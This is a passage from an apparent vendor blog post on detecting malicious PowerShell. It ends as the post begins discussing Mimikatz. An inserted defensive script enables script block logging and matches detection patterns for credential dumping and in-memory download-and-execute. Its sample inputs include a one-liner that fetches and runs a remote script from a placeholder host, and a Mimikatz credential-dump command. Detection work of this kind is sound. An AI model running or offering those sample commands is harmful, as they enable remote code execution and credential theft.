The Importance of Preventing and Detecting Malicious PowerShell Attacks

Hello! My name is Rohit Chettiar, and I am a Solutions Engineer at Rapid7. In this series, we will discuss why organizations should care about malicious PowerShell activity, how attackers use PowerShell to steal credentials (e.g., Mimikatz), and how to prevent and detect malicious PowerShell activity.


Why do attackers love PowerShell?


PowerShell, a powerful Windows scripting language, is used by IT professionals and adversaries alike. Attackers favor PowerShell for several reasons:


It is a built-in command line tool
It can download and execute code from another system
It provides unprecedented access on Windows computers
It’s enabled on most computers, as system administrators use PowerShell to automate various tasks (e.g., shutting machines down automatically at 12 a.m. via Task Scheduler)
Its malicious use is often not stopped or detected by traditional endpoint defenses, as files and commands are not written to disk. This means fewer artifacts to recover for forensic analysis.

Several offensive tools exist that are built on or use PowerShell, including the following:


Despite these challenges, eliminating PowerShell isn’t ideal due to the benefits it offers IT administrators. Instead, we need to learn how to secure PowerShell. A common issue we experience is a lack of available logging to understand the actions an attacker has performed using PowerShell. These logs will help you obtain the visibility needed to better respond, investigate, and remediate attacks involving PowerShell.
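The logging gap described above can be closed with PowerShell's own script block logging (event ID 4104). The following is an added example, not code from the original post or from Rapid7: it checks (and can enable) the script block logging policy key, and runs a simple indicator match over script block text; the function names are hypothetical and the sample script blocks are constructed, so it runs on any machine without live events.

```powershell
# Added example (not from the original post). Helper names are hypothetical.
# Policy key written by the GPO "Turn on PowerShell Script Block Logging".
$SblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Test-PSScriptBlockLogging {
    # $true when the policy value EnableScriptBlockLogging is set to 1.
    $v = Get-ItemProperty -Path $SblKey -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.EnableScriptBlockLogging -eq 1)
}

function Enable-PSScriptBlockLogging {
    # Creates the policy key and turns logging on; needs an elevated session.
    New-Item -Path $SblKey -Force | Out-Null
    Set-ItemProperty -Path $SblKey -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

# Indicators matching the post's themes: in-memory download-and-execute, encoding, credential dumping.
$Patterns = @(
    'DownloadString', 'DownloadFile', 'Invoke-Expression', '\bIEX\b',
    'FromBase64String', '-EncodedCommand', '\s-enc\b',
    'Invoke-Mimikatz', 'sekurlsa', 'lsadump', 'Reflection\.Assembly'
)

function Find-SuspiciousScriptBlock {
    # Emits one object per script block that matches any indicator; -match is case-insensitive.
    param([Parameter(ValueFromPipeline)][string]$ScriptBlockText)
    process {
        $hits = @($Patterns | Where-Object { $ScriptBlockText -match $_ })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Indicators = ($hits -join ', '); Text = $ScriptBlockText }
        }
    }
}

function Get-LoggedScriptBlocks {
    # Event 4104 in Microsoft-Windows-PowerShell/Operational carries the de-obfuscated script text in Properties[2].
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Properties[2].Value }
}

# Constructed sample script blocks standing in for live 4104 events.
$Sample = @(
    'Get-ChildItem C:\Temp | Measure-Object',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/x.ps1")',
    'Invoke-Mimikatz -DumpCreds'
)

"Script block logging policy enabled: $(Test-PSScriptBlockLogging)"
$Sample | Find-SuspiciousScriptBlock | Format-Table -AutoSize
# Live log instead of the sample: Get-LoggedScriptBlocks | Find-SuspiciousScriptBlock
```

The first sample block produces no output; the other two are reported with the indicators they matched, which is the kind of artifact the post says is otherwise missing when nothing is written to disk.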


Before we look at different ways in which we can defend against PowerShell attacks, let’s take a deep dive into PowerShell usage to dump passwords with Mimikatz.


What is Mimikatz, and how does it ..